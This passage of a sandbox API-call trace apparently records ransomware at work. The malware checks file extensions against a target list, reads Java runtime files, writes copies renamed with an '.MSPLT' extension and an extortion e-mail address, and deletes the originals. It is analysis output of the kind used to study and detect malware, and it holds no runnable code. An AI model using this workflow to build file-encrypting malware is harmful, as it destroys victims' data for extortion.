(lpString=".xlsx") returned 5 [0174.424] lstrcmpiW (lpString1=".xlsx", lpString2="h.gif") returned -1 [0174.424] lstrlenW (lpString=".ppt") returned 4 [0174.424] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.424] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.424] lstrlenW (lpString=".zip") returned 4 [0174.424] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.424] lstrlenW (lpString=".rar") returned 4 [0174.424] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.424] lstrlenW (lpString=".bz2") returned 4 [0174.424] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.425] lstrlenW (lpString=".7z") returned 3 [0174.425] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.425] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.425] lstrlenW (lpString=".dbf") returned 4 [0174.425] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.425] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.425] lstrlenW (lpString=".1cd") returned 4 [0174.425] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.425] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.425] lstrlenW (lpString=".jpg") returned 4 [0174.425] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.425] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.425] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.425] lstrlenW (lpString=".doc") returned 4 [0174.425] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.425] lstrlenW (lpString=".docx") returned 5 [0174.425] lstrcmpiW (lpString1=".docx", lpString2="h.gif") returned -1 [0174.425] lstrlenW (lpString=".pdf") returned 4 [0174.425] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.425] lstrlenW (lpString=".xls") returned 4 [0174.425] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.425] lstrlenW (lpString=".xlsx") returned 5 [0174.425] lstrcmpiW (lpString1=".xlsx", lpString2="h.gif") returned -1 [0174.425] lstrlenW (lpString=".ppt") returned 4 [0174.425] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.425] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.425] lstrlenW (lpString=".zip") returned 4 [0174.426] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.426] lstrlenW (lpString=".rar") returned 4 [0174.426] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.426] lstrlenW (lpString=".bz2") returned 4 [0174.426] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.426] lstrlenW (lpString=".7z") returned 3 [0174.426] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.426] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.426] lstrlenW (lpString=".dbf") returned 4 [0174.426] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.426] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.426] lstrlenW (lpString=".1cd") returned 4 [0174.426] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.426] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0174.426] lstrlenW (lpString=".jpg") returned 4 [0174.426] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.426] lstrcmpiW (lpString1=".gif", lpString2=".MSPLT") returned -1 [0174.426] lstrlenW (lpString="splash_11-lic.gif") returned 17 [0174.426] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0174.427] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=7805) returned 1 [0174.427] CloseHandle (hObject=0x2fc) returned 1 [0174.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif")) returned 0x20 [0174.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.427] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0174.427] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.428] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.428] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0174.428] GetLastError () returned 0x0 [0174.428] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x1e7d, lpOverlapped=0x0) returned 1 [0174.456] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x1e80, lpOverlapped=0x0) returned 1 [0174.457] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0174.457] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf6, lpOverlapped=0x0) returned 1 [0174.457] SetEndOfFile (hFile=0x2f4) returned 1 [0174.457] CloseHandle (hObject=0x2f4) returned 1 [0174.460] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.460] SetEndOfFile (hFile=0x2fc) returned 1 [0174.461] CloseHandle (hObject=0x2fc) returned 1 [0174.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.461] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif")) returned 1 [0174.462] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.462] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.462] lstrlenW (lpString=".doc") returned 4 [0174.462] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.462] lstrlenW (lpString=".docx") returned 5 [0174.462] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0174.462] lstrlenW (lpString=".pdf") returned 4 [0174.462] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.462] lstrlenW (lpString=".xls") returned 4 [0174.462] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.462] lstrlenW (lpString=".xlsx") returned 5 [0174.462] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0174.462] lstrlenW (lpString=".ppt") returned 4 [0174.462] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.462] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.462] lstrlenW (lpString=".zip") returned 4 [0174.462] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.462] lstrlenW (lpString=".rar") returned 4 [0174.462] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.462] lstrlenW (lpString=".bz2") returned 4 [0174.462] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.462] lstrlenW (lpString=".7z") returned 3 [0174.462] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.462] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.462] lstrlenW (lpString=".dbf") returned 4 [0174.462] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.462] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.462] lstrlenW (lpString=".1cd") returned 4 [0174.462] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.462] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.462] lstrlenW (lpString=".jpg") returned 4 [0174.462] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.463] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.463] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.463] lstrlenW (lpString=".doc") returned 4 [0174.463] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.463] lstrlenW (lpString=".docx") returned 5 [0174.463] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0174.463] lstrlenW (lpString=".pdf") returned 4 [0174.463] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.463] lstrlenW (lpString=".xls") returned 4 [0174.463] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.463] lstrlenW (lpString=".xlsx") returned 5 [0174.463] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0174.463] lstrlenW (lpString=".ppt") returned 4 [0174.463] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.463] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.463] lstrlenW (lpString=".zip") returned 4 [0174.463] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.463] lstrlenW (lpString=".rar") returned 4 [0174.463] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.463] lstrlenW (lpString=".bz2") returned 4 [0174.463] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.463] lstrlenW (lpString=".7z") returned 3 [0174.463] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.463] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.463] lstrlenW (lpString=".dbf") returned 4 [0174.463] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.463] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.463] lstrlenW (lpString=".1cd") returned 4 [0174.463] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.463] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 63 [0174.464] lstrlenW (lpString=".jpg") returned 4 [0174.464] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.464] lstrcmpiW (lpString1=".gif", lpString2=".MSPLT") returned -1 [0174.464] lstrlenW (lpString="invalid32x32.gif") returned 16 [0174.464] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0174.465] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=153) returned 1 [0174.465] CloseHandle (hObject=0x2fc) returned 1 [0174.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif")) returned 0x20 [0174.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.465] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0174.465] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.465] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.466] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0174.466] GetLastError () returned 0x0 [0174.466] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x99, lpOverlapped=0x0) returned 1 [0174.915] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xa0, lpOverlapped=0x0) returned 1 [0174.916] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0174.917] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xf4, lpOverlapped=0x0) returned 1 [0174.917] SetEndOfFile (hFile=0x2f4) returned 1 [0174.918] CloseHandle (hObject=0x2f4) returned 1 [0174.920] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.920] SetEndOfFile (hFile=0x2fc) returned 1 [0174.920] CloseHandle (hObject=0x2fc) returned 1 [0174.921] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.921] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif")) returned 1 [0174.921] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.921] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.921] lstrlenW (lpString=".doc") returned 4 [0174.921] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.921] lstrlenW (lpString=".docx") returned 5 [0174.921] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.921] lstrlenW (lpString=".pdf") returned 4 [0174.921] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.921] lstrlenW (lpString=".xls") returned 4 [0174.921] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.921] lstrlenW (lpString=".xlsx") returned 5 [0174.921] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.921] lstrlenW (lpString=".ppt") returned 4 [0174.921] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.922] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.922] lstrlenW (lpString=".zip") returned 4 [0174.922] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.922] lstrlenW (lpString=".rar") returned 4 [0174.922] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.922] lstrlenW (lpString=".bz2") returned 4 [0174.922] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.922] lstrlenW (lpString=".7z") returned 3 [0174.922] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.922] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.922] lstrlenW (lpString=".dbf") returned 4 [0174.922] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.922] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.922] lstrlenW (lpString=".1cd") returned 4 [0174.922] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.922] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.922] lstrlenW (lpString=".jpg") returned 4 [0174.922] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.922] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.922] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.922] lstrlenW (lpString=".doc") returned 4 [0174.922] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.922] lstrlenW (lpString=".docx") returned 5 [0174.922] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0174.922] lstrlenW (lpString=".pdf") returned 4 [0174.922] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.923] lstrlenW (lpString=".xls") returned 4 [0174.923] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.923] lstrlenW (lpString=".xlsx") returned 5 [0174.923] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0174.923] lstrlenW (lpString=".ppt") returned 4 [0174.923] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.923] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.923] lstrlenW (lpString=".zip") returned 4 [0174.923] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.923] lstrlenW (lpString=".rar") returned 4 [0174.923] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.923] lstrlenW (lpString=".bz2") returned 4 [0174.923] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.923] lstrlenW (lpString=".7z") returned 3 [0174.923] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.923] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.923] lstrlenW (lpString=".dbf") returned 4 [0174.923] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.923] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.923] lstrlenW (lpString=".1cd") returned 4 [0174.923] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.923] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\invalid32x32.gif") returned 70 [0174.923] lstrlenW (lpString=".jpg") returned 4 [0174.923] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.923] lstrcmpiW (lpString1=".dat", lpString2=".MSPLT") returned -1 [0174.924] lstrlenW (lpString="tzdb.dat") returned 8 [0174.924] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0174.925] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=105500) returned 1 [0174.925] CloseHandle (hObject=0x2fc) returned 1 [0174.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat")) returned 0x20 [0174.925] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.925] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0174.925] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.925] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.925] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0174.926] GetLastError () returned 0x0 [0174.926] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x19c1c, lpOverlapped=0x0) returned 1 [0174.931] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x19c20, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x19c20, lpOverlapped=0x0) returned 1 [0174.934] ReadFile (in: hFile=0x2fc, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0174.934] WriteFile (in: hFile=0x2f4, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xe4, lpOverlapped=0x0) returned 1 [0174.934] SetEndOfFile (hFile=0x2f4) returned 1 [0174.935] CloseHandle (hObject=0x2f4) returned 1 [0174.943] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0174.943] SetEndOfFile (hFile=0x2fc) returned 1 [0174.945] CloseHandle (hObject=0x2fc) returned 1 [0174.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.945] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat")) returned 1 [0174.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.946] lstrlenW (lpString=".doc") returned 4 [0174.946] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0174.946] lstrlenW (lpString=".docx") returned 5 [0174.946] lstrcmpiW (lpString1=".docx", lpString2="b.dat") returned -1 [0174.946] lstrlenW (lpString=".pdf") returned 4 [0174.946] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0174.946] lstrlenW (lpString=".xls") returned 4 [0174.946] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0174.946] lstrlenW (lpString=".xlsx") returned 5 [0174.946] lstrcmpiW (lpString1=".xlsx", lpString2="b.dat") returned -1 [0174.946] lstrlenW (lpString=".ppt") returned 4 [0174.946] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0174.946] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0174.946] lstrlenW (lpString=".zip") returned 4 [0174.946] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0174.946] lstrlenW (lpString=".rar") returned 4 [0174.946] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0174.946] lstrlenW (lpString=".bz2") returned 4 [0174.947] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0174.947] 